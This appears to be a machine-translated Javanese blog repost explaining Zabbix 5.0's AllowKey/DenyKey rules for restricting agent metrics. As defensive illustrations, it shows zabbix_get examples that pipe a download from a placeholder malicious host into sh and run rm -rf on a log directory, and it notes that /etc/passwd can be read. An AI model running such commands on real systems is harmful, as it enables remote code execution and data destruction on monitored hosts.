ProHoster > Блог > Administrasi > Dhukungan kanggo blacklisting lan whitelisting kanggo metrik sisih agen ing Zabbix 5.0

Dhukungan kanggo blacklisting lan whitelisting kanggo metrik sisih agen ing Zabbix 5.0

Dhukungan kanggo blacklisting lan whitelisting kanggo metrik sisih agen ing Zabbix 5.0

Dhukungan dhaptar ireng lan putih kanggo metrik sisih agen

Tikhon Uskov, Insinyur Integrasi, Zabbix

Masalah keamanan data

Zabbix 5.0 duwe fitur anyar sing ngidini sampeyan nambah keamanan ing sistem nggunakake Agen Zabbix lan ngganti parameter lawas. EnableRemoteCommands.

Peningkatan keamanan sistem adhedhasar agen asale saka kasunyatan manawa agen bisa nindakake akeh tumindak sing bisa mbebayani.

  • Agen bisa ngumpulake meh kabeh informasi, kalebu informasi rahasia utawa duweni potensi mbebayani, saka file konfigurasi, file log, file sandi utawa file liyane.

Contone, nggunakake sarana zabbix_get sampeyan bisa ngakses dhaptar pangguna, direktori ngarep, file sandhi, lsp.

Dhukungan kanggo blacklisting lan whitelisting kanggo metrik sisih agen ing Zabbix 5.0

Ngakses data nggunakake utilitas zabbix_get

CATETAN. Data mung bisa dijupuk yen agen wis maca ijin ing file sing cocog. Nanging, contone, file /etc/passwd/ bisa diwaca dening kabeh pangguna.

  • Agen uga bisa nglakokake prentah sing bisa mbebayani. Contone, kunci *system.run[]** ngidini sampeyan nglakokake printah remot ing node jaringan, kalebu skrip sing mlaku saka antarmuka web Zabbix sing uga nglakokake prentah ing sisih agen. 

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

  • Ing Linux, agen kasebut mlaku kanthi standar tanpa hak istimewa root, nalika ing Windows mlaku minangka layanan minangka Sistem lan nduweni akses tanpa wates menyang sistem file. Mulane, yen ora ana owah-owahan ing paramèter Zabbix Agent sawise instalasi, agen nduweni akses menyang registri, sistem file lan bisa nglakokake pitakon WMI.

Ing versi sadurungé parameter EnableRemoteCommands=0 mung diijini mateni metrik nganggo tombol *system.run[]** lan mbukak skrip saka antarmuka web, nanging ora ana cara kanggo matesi akses menyang file individu, ngidini utawa mateni tombol individu sing diinstal karo agen, utawa matesi panggunaan paramèter individu.

Dhukungan kanggo blacklisting lan whitelisting kanggo metrik sisih agen ing Zabbix 5.0

Nggunakake parameter EnableRemoteCommand ing versi Zabbix sadurungé

AllowKey/DenyKey

Zabbix 5.0 mbantu nglindhungi saka akses ora sah kasebut kanthi nyedhiyakake whitelist lan blacklist kanggo ngidini lan nolak metrik ing sisih agen.

Ing Zabbix 5.0 kabeh tombol, kalebu *system.run[]** diaktifake, lan rong opsi konfigurasi agen anyar wis ditambahake:

AllowKey = - mriksa diijini;

DenyKey= - mriksa dilarang;

ngendi iku pola jeneng tombol karo paramèter sing nggunakake metacharacters (*).

Tombol AllowKey lan DenyKey ngidini sampeyan ngidini utawa nolak metrik individu adhedhasar pola tartamtu. Ora kaya paramèter konfigurasi liyane, jumlah paramèter AllowKey/DenyKey ora diwatesi. Iki ngidini sampeyan nemtokake kanthi jelas apa sing bisa ditindakake agen ing sistem kanthi nggawe wit cek - tombol sing bisa dieksekusi, ing ngendi urutan sing ditulis nduweni peran sing penting banget.

Urutan aturan

Aturan kasebut dicenthang miturut urutan sing dilebokake ing file konfigurasi. Tombol dicenthang miturut aturan sadurunge pertandhingan pisanan, lan sanalika kunci unsur data cocog karo pola kasebut, diijini utawa ditolak. Sawise iki, pamriksa aturan mandheg lan kunci sing isih ana ora digatekake.

Mulane, yen unsur cocog karo aturan ngidini lan nolak, asil bakal gumantung ing aturan pisanan ing file konfigurasi.

Dhukungan kanggo blacklisting lan whitelisting kanggo metrik sisih agen ing Zabbix 5.0

2 aturan sing beda kanthi pola lan kunci sing padha vfs.file.size[/tmp/file]

Urutan nggunakake tombol AllowKey/DenyKey:

  1. aturan sing tepat,
  2. aturan umum,
  3. aturan larangan.

Contone, yen sampeyan butuh akses menyang file ing folder tartamtu, sampeyan kudu ngidini akses menyang file kasebut, banjur nolak kabeh sing ora ana ing ijin sing wis ditemtokake. Yen aturan nolak digunakake dhisik, akses menyang folder bakal ditolak.

Dhukungan kanggo blacklisting lan whitelisting kanggo metrik sisih agen ing Zabbix 5.0

Urutan sing bener

Yen sampeyan kudu ngidini 2 keperluan kanggo mbukak liwat *system.run[]**, lan aturan nolak bakal ditemtokake dhisik, utilitas ora bakal dibukak, amarga pola pisanan bakal tansah cocog sembarang tombol, lan aturan sakteruse bakal digatèkaké.

Dhukungan kanggo blacklisting lan whitelisting kanggo metrik sisih agen ing Zabbix 5.0

Urutan sing salah

Pola

Aturan dhasar

Pola minangka ekspresi kanthi wildcard. Metakarakter (*) cocog karo sembarang karakter ing posisi tartamtu. Metakarakter bisa digunakake ing jeneng kunci lan ing paramèter. Contone, sampeyan bisa nemtokake parameter pisanan kanthi ketat kanthi teks, lan nemtokake sing sakteruse minangka wildcard.

Parameter kudu dilampirake ing kurung kotak [].

  • system.run[* - salah
  • vfs.file*.txt] - salah
  • vfs.file.*[*] - bener

Conto nggunakake wildcard.

  1. Ing jeneng tombol lan ing parameter. Ing kasus iki, tombol kasebut ora cocog karo tombol sing padha sing ora ngemot parameter, amarga ing pola kasebut kita nuduhake yen kita pengin nampa pungkasan tartamtu saka jeneng tombol lan paramèter tartamtu.
  2. Yen pola ora nggunakake kurung kothak, pola kasebut ngidini kabeh tombol sing ora ngemot parameter lan nolak kabeh tombol sing ngemot parameter kasebut.
  3. Yen tombol ditulis kanthi lengkap lan paramèter kasebut minangka wildcard, bakal cocog karo tombol sing padha karo paramèter lan ora cocog karo tombol tanpa tanda kurung, yaiku bakal diidini utawa ditolak.

Dhukungan kanggo blacklisting lan whitelisting kanggo metrik sisih agen ing Zabbix 5.0

Aturan kanggo ngisi paramèter.

  • Yen tombol karo paramèter arep digunakake, paramèter kasebut kudu ditemtokake ing file konfigurasi. Parameter kudu ditemtokake minangka metacharacter. Sampeyan kudu kanthi ati-ati nolak akses menyang file apa wae lan nimbang informasi apa sing bisa diwenehake dening metrik ing macem-macem ejaan - kanthi lan tanpa parameter.

Dhukungan kanggo blacklisting lan whitelisting kanggo metrik sisih agen ing Zabbix 5.0

Fitur nulis tombol kanthi paramèter

  • Yen tombol ditemtokake karo paramèter, nanging paramèter kasebut opsional lan ditemtokake minangka metacharacter, tombol tanpa paramèter bakal ditanggulangi. Contone, yen sampeyan pengin mateni nampa informasi bab mbukak ing CPU lan nemtokake sing system.cpu.load [*] tombol kudu dipatèni, aja lali sing tombol tanpa paramèter bakal bali Nilai mbukak rata-rata.

Dhukungan kanggo blacklisting lan whitelisting kanggo metrik sisih agen ing Zabbix 5.0

Aturan kanggo ngisi paramèter

Cathetan

imbuhan

  • Sawetara aturan ora bisa diganti dening pangguna, contone, aturan panemuan utawa aturan registrasi otomatis agen. Aturan AllowKey/DenyKey ora mengaruhi paramèter ing ngisor iki:
    - HostnameItem
    - HostMetadataItem
    - HostInterfaceItem

CATETAN. Yen administrator mateni kunci, nalika ditakoni, Zabbix ora menehi informasi babagan sebabe metrik utawa kunci kasebut kalebu kategori 'Ora didhukung'. Informasi babagan larangan nglakokake perintah remot uga ora ditampilake ing file log agen. Iki amarga alasan keamanan, nanging bisa uga nggawe rumit debugging yen metrik kalebu ing kategori sing ora didhukung amarga sawetara alasan.

  • Sampeyan ngirim ora gumantung ing sembarang urutan tartamtu kanggo nyambungake file konfigurasi external (contone, ing urutan abjad).

Utilitas Command Line

Sawise nyetel aturan, sampeyan kudu nggawe manawa kabeh wis diatur kanthi bener.

Sampeyan bisa nggunakake salah siji saka telung opsi:

  • Tambah metrik menyang Zabbix.
  • Test karo zabbix_agentd. Agen Zabbix kanthi pilihan -print (-p) nuduhake kabeh tombol (sing diijini minangka standar) kajaba sing ora diijini dening konfigurasi. Lan kanthi pilihan -test (-t) amarga kunci sing dilarang bakal bali 'Tombol item sing ora didhukung'.
  • Test karo zabbix_get. Utilitas zabbix_get karo pilihan -k bakal bali'ZBX_NOTSUPPORTED: Metrik ora dingerteni'.

Ngidini utawa nolak

Sampeyan bisa nolak akses menyang file lan verifikasi, contone, nggunakake sarana zabbix_getakses menyang file ditolak.

Dhukungan kanggo blacklisting lan whitelisting kanggo metrik sisih agen ing Zabbix 5.0

**

CATETAN. Kutipan ing paramèter ora digatèkaké.

Ing kasus iki, akses menyang file kasebut bisa diidini liwat dalan sing beda. Contone, yen symlink mimpin menyang.

Dhukungan kanggo blacklisting lan whitelisting kanggo metrik sisih agen ing Zabbix 5.0

Disaranake kanggo mriksa macem-macem opsi kanggo nglamar aturan kasebut, lan uga njupuk menyang akun kemungkinan circumventing larangan.

Pitakonan lan Jawaban

Pitakonan sampeyan. Apa sebabe pola sing kompleks kanthi basa dhewe dipilih kanggo nggambarake aturan, ijin lan larangan? Yagene ora bisa nggunakake, contone, ekspresi reguler sing digunakake Zabbix?

Nuwun. Iki minangka masalah kinerja regex amarga biasane mung siji agen lan mriksa akeh metrik. Regex minangka operasi sing cukup abot lan kita ora bisa mriksa ewu metrik kanthi cara iki. Wildcards - solusi universal, digunakake lan prasaja.

Pitakonan sampeyan. Apa ora kalebu file kalebu ing urutan abjad?

Nuwun. Sa adoh aku ngerti, iku sakbenere mokal kanggo prédhiksi urutan kang aturan bakal Applied yen sampeyan nyebar aturan ing file beda. Aku nyaranake ngumpulake kabeh aturan AllowKey / DenyKey ing siji Kalebu file, amarga padha sesambungan karo saben liyane, lan kalebu file iki.

Pitakonan sampeyan. Ing Zabbix 5.0 opsi 'EnableRemoteCommands=' ilang saka file konfigurasi, lan mung AllowKey / DenyKey sing kasedhiya?

Wangsulan. pancen bener.

Matur suwun!

Source: www.habr.com

Add a comment